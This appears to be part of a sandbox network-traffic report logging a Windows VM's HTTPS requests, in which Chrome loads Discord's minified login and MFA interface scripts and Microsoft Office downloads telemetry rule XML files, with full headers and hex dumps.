                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 17689
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d10edc23c463-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "14e84006f1aa9308539c8042de09b598"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Oct 2024 20:12:28 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dM94GBbxogSq7pKeKl6BBx6phMB%2FFP%2Bfa63swKkdMtdv2wKrPOwphHomwCVQpjLSX7QR%2B22d8QeXk2a%2BJOnItzgDT20Gn4YmtkOKqVleNpq1JJaHNOedLo9ji99L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC405INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 31 32 36 30 22 5d 2c 7b 32 36 32 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 61 66 64 34 34 61 65 30 35 31 32 36 62 35 66 61 62 34 30 64 2e 73 76 67 22 7d 2c 39 33 35 32 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 35 30 62 39 36 36 30 31 31 37 31 66 64 33 36 31 31 30 31 63 2e 73 76 67 22 7d 2c 34 37 39 34 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 28 37 35 37 31 34 33 29
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11260"],{26230:function(e){e.exports="/assets/afd44ae05126b5fab40d.svg"},935227:function(e){e.exports="/assets/50b96601171fd361101c.svg"},479495:function(e,t,n){n(757143)
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 28 31 32 34 38 36 30 29 2c 78 3d 6e 28 31 30 38 34 32 37 29 2c 43 3d 6e 28 33 31 34 38 39 37 29 2c 76 3d 6e 28 35 38 35 34 38 33 29 2c 4e 3d 6e 28 39 38 31 36 33 31 29 2c 6a 3d 6e 28 33 38 38 30 33 32 29 2c 79 3d 6e 28 31 31 33 32 30 37 29 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 75 2e 5a 50 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 3b 63 6c 61 73 73 20 6b 20 65 78 74 65 6e 64 73 28 73 3d 69 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 29 7b 63
                                                                                                                                                                                                                                                                                    Data Ascii: (124860),x=n(108427),C=n(314897),v=n(585483),N=n(981631),j=n(388032),y=n(113207);function E(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}u.ZP.initialize();class k extends(s=i.PureComponent){c
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 52 45 53 45 54 22 7d 29 7d 2c 77 69 64 74 68 3a 34 38 30 7d 29 7d 29 7d 72 65 6e 64 65 72 53 75 63 63 65 65 64 65 64 28 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 6d 2e 5a 50 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 61 6c 74 3a 22 22 2c 73 72 63 3a 6e 28 32 36 32 33 30 29 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 28 29 28 79 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 32 30 2c 63 2e 74 71 3f 79 2e 6d 61 72 67 69 6e 54 6f 70 32 30 3a 22 22 29 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6d 2e 44 78 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 79 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 34 30 2c 63 68 69 6c 64 72 65 6e 3a 6a 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6a 2e 74 2e
                                                                                                                                                                                                                                                                                    Data Ascii: tch({type:"LOGIN_RESET"})},width:480})})}renderSucceeded(){return(0,r.jsxs)(m.ZP,{children:[(0,r.jsx)("img",{alt:"",src:n(26230),className:l()(y.marginBottom20,c.tq?y.marginTop20:"")}),(0,r.jsx)(m.Dx,{className:y.marginBottom40,children:j.intl.string(j.t.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 69 73 2e 73 74 61 74 65 3b 69 66 28 30 3d 3d 3d 6c 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 64 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 52 45 53 45 54 22 7d 29 2c 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 29 3b 6c 65 74 20 61 3d 69 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 21 3d 6e 26 26 28 61 3d 28 30 2c 70 2e 5a 29 28 6e 29 29 2c 6e 75 6c 6c 3d 3d 61 29 3f 28 64 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 47 49 4e 5f 52 45 53 45 54 22 7d 29 2c 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 29 29 3a 68 2e 5a 2e 72 65 73 65 74 50 61 73 73 77 6f 72 64 4d 46 41 76 32 28 7b 6d 65 74 68 6f 64 3a 65 2c 63 6f 64 65 3a 74 2c 74 69 63 6b 65 74 3a 73 2c 70 61 73 73 77 6f 72 64 3a 6c 2c 74 6f 6b 65 6e 3a 61 2c 73
                                                                                                                                                                                                                                                                                    Data Ascii: is.state;if(0===l.length)return d.Z.dispatch({type:"LOGIN_RESET"}),Promise.reject();let a=i;return(null!=n&&(a=(0,p.Z)(n)),null==a)?(d.Z.dispatch({type:"LOGIN_RESET"}),Promise.reject()):h.Z.resetPasswordMFAv2({method:e,code:t,ticket:s,password:l,token:a,s
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 75 2e 63 6a 29 28 5b 43 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 28 7b 6c 6f 67 69 6e 53 74 61 74 75 73 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 4c 6f 67 69 6e 53 74 61 74 75 73 28 29 2c 6d 66 61 54 69 63 6b 65 74 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 46 41 54 69 63 6b 65 74 28 29 2c 65 72 72 6f 72 73 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 45 72 72 6f 72 73 28 29 2c 6d 66 61 4d 65 74 68 6f 64 73 3a 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 4d 46 41 4d 65 74 68 6f 64 73 28 29 7d 29 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 29 28 6b 2c 7b 2e 2e 2e 65 2c 2e 2e 2e 74 7d 29 7d 7d 2c 31 32 39 32 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b
                                                                                                                                                                                                                                                                                    Data Ascii: u.cj)([C.default],()=>({loginStatus:C.default.getLoginStatus(),mfaTicket:C.default.getMFATicket(),errors:C.default.getErrors(),mfaMethods:C.default.getMFAMethods()}));return(0,r.jsx)(k,{...e,...t})}},129293:function(e,t,n){n.d(t,{Z:function(){return r}});
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 63 6c 61 73 73 20 68 20 65 78 74 65 6e 64 73 28 73 3d 6f 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 29 7b 72 65 6e 64 65 72 28 29 7b 6c 65 74 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 22 69 6e 70 75 74 22 2c 7b 72 65 66 3a 74 68 69 73 2e 73 65 74 43 6f 64 65 42 6c 6f 63 6b 52 65 66 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 28 29 28 75 2e 69 6e 70 75 74 2c 65 29 2c 6d 61 78 4c 65 6e 67 74 68 3a 31 2c 76 61 6c 75 65 3a 6e 75 6c
                                                                                                                                                                                                                                                                                    Data Ascii: bject.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}class h extends(s=o.PureComponent){render(){let{className:e}=this.props;return(0,i.jsx)("input",{ref:this.setCodeBlockRef,className:a()(u.input,e),maxLength:1,value:nul
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 2e 41 6c 69 67 6e 2e 43 45 4e 54 45 52 2c 6a 75 73 74 69 66 79 3a 63 2e 5a 2e 4a 75 73 74 69 66 79 2e 43 45 4e 54 45 52 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 73 7d 29 7d 73 65 74 43 6f 64 65 42 6c 6f 63 6b 52 65 66 28 65 2c 74 29 7b 74 68 69 73 2e 5f 63 6f 64 65 42 6c 6f 63 6b 52 65 66 73 5b 65 5d 3d 74 7d 68 61 6e 64 6c 65 43 68 61 6e 67 65 28 65 2c 74 29 7b 74 68 69 73 2e 73 74 61 74 65 2e 63 6f 64 65 73 5b 65 5d 3d 74 3b 6c 65 74 20 6e 3d 74 68 69 73 2e 67 65 74 43 6f 64 65 4f 72 46 69 72 73 74 45 6d 70 74 79 49 6e 64 65 78 28 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 74 68 69 73 2e 73 75 62 6d 69 74 28 6e 29 3b 65 6c 73 65 7b 6c 65 74 20 65 3d 74 68 69 73 2e 5f 63 6f 64 65 42 6c 6f 63 6b 52 65
                                                                                                                                                                                                                                                                                    Data Ascii: .Align.CENTER,justify:c.Z.Justify.CENTER,className:e,children:s})}setCodeBlockRef(e,t){this._codeBlockRefs[e]=t}handleChange(e,t){this.state.codes[e]=t;let n=this.getCodeOrFirstEmptyIndex();if("string"==typeof n)this.submit(n);else{let e=this._codeBlockRe
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 69 63 61 74 65 64 28 29 7d 29 29 2c 6a 3d 6e 65 77 20 70 2e 5a 28 6e 29 2c 77 3d 6c 26 26 28 6e 75 6c 6c 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 69 64 29 3d 3d 3d 6a 2e 69 64 2c 53 3d 6e 2e 74 6f 6b 65 6e 53 74 61 74 75 73 3d 3d 3d 4e 2e 71 2e 49 4e 56 41 4c 49 44 2c 41 3d 6f 7c 7c 6a 2e 69 73 50 6f 6d 65 6c 6f 28 29 3f 6e 75 6c 6c 3a 22 23 22 2e 63 6f 6e 63 61 74 28 6a 2e 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 29 2c 62 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 77 3f 62 3d 28 30 2c 69 2e 6a 73 78 29 28 75 2e 54 65 78 74 2c 7b 76 61 72 69 61 6e 74 3a 22 74 65 78 74 2d 73 6d 2f 73 65 6d 69 62 6f 6c 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 68 69 6e 74 54 65 78 74 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2d 70 6f 73 69 74 69 76 65 22 2c 63 68 69 6c 64 72 65 6e 3a
                                                                                                                                                                                                                                                                                    Data Ascii: icated()})),j=new p.Z(n),w=l&&(null==r?void 0:r.id)===j.id,S=n.tokenStatus===N.q.INVALID,A=o||j.isPomelo()?null:"#".concat(j.discriminator),b=null;return w?b=(0,i.jsx)(u.Text,{variant:"text-sm/semibold",className:k.hintText,color:"text-positive",children:
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 63 74 69 6f 6e 4d 65 6e 75 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 30 2c 68 2e 76 71 29 28 65 2c 65 3d 3e 7b 6c 65 74 7b 6f 6e 53 65 6c 65 63 74 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 75 2e 4d 65 6e 75 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 45 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 45 2e 74 5b 22 34 31 71 69 44 51 22 5d 29 2c 6e 61 76 49 64 3a 22 6d 61 6e 61 67 65 2d 6d 75 6c 74 69 2d 61 63 63 6f 75 6e 74 22 2c 6f 6e 43 6c 6f 73 65 3a 68 2e 5a 79 2c 6f 6e 53 65 6c 65 63 74 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 75 2e 4d 65 6e 75 49 74 65 6d 2c 7b 69 64 3a 22 72 65 6d 6f 76 65 2d 61 63 63 6f 75 6e 74 22 2c 6c 61 62 65 6c 3a 45 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 45 2e
                                                                                                                                                                                                                                                                                    Data Ascii: ctionMenu,onClick:function(e){(0,h.vq)(e,e=>{let{onSelect:t}=e;return(0,i.jsx)(u.Menu,{"aria-label":E.intl.string(E.t["41qiDQ"]),navId:"manage-multi-account",onClose:h.Zy,onSelect:t,children:(0,i.jsx)(u.MenuItem,{id:"remove-account",label:E.intl.string(E.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1369INData Raw: 74 73 57 69 74 68 28 22 2b 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 70 68 6f 6e 65 22 3d 3d 3d 65 3f 21 6f 28 74 29 3a 22 65 6d 61 69 6c 22 21 3d 3d 65 26 26 21 28 74 2e 6c 65 6e 67 74 68 3c 33 29 26 26 69 2e 74 65 73 74 28 74 29 7d 7d 2c 37 36 36 36 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 7d 29 2c 6e 28 34 37 31 32 30 29 3b 76 61 72 20 73 3d 6e 28 32 30 30 36 35 31 29 2c 72 3d 6e 28 31 39 32 33 37 39 29 2c 69 3d 6e 28 31 32 30 33 35 36 29 2c 6f 3d 6e 2e 6e 28 69 29 2c 6c 3d 6e 28 31 30 30 36 32 31 29 2c 61 3d 6e 28 34 38 31 30 36 30 29 2c 63 3d 6e 28 31 34 34 31 31 34 29 2c 75 3d 6e 28 33 31 37 31 37 35 29 2c 64 3d
                                                                                                                                                                                                                                                                                    Data Ascii: tsWith("+");function l(e,t){return"phone"===e?!o(t):"email"!==e&&!(t.length<3)&&i.test(t)}},766650:function(e,t,n){n.d(t,{Z:function(){return h}}),n(47120);var s=n(200651),r=n(192379),i=n(120356),o=n.n(i),l=n(100621),a=n(481060),c=n(144114),u=n(317175),d=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    134192.168.2.549859162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1398OUTGET /assets/55ad931ed92a15c15709.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    Range: bytes=102533-102533
                                                                                                                                                                                                                                                                                    If-Range: "80f500d4d0495e5c74e9b92cbc26f088"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC992INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Range: bytes 102533-102533/109613
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d10f58748c6c-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "80f500d4d0495e5c74e9b92cbc26f088"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 15 Oct 2024 21:49:59 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prPhMim4BunLLNsPQ%2BbNjjzCP706IlB0HBfBuozEIOT47ZV7af6W6Acin51UBm%2Bp7w2kZjM1fQR2H%2F9y9RydCyz7WBR3Dswpfjo0Ks3glxIzveaWwxhdB4eCDnqZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC1INData Raw: 3d
                                                                                                                                                                                                                                                                                    Data Ascii: =


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    135192.168.2.54985413.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                    x-ms-request-id: db5fa324-001e-00ad-2244-3c554b000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201253Z-15b8b599d88m7pn7hC1TEB4axw00000003cg00000000ffy4
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    136192.168.2.54985313.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201252Z-178bfbc474brk967hC1NYCfu6000000004s0000000009zwm
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:53 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
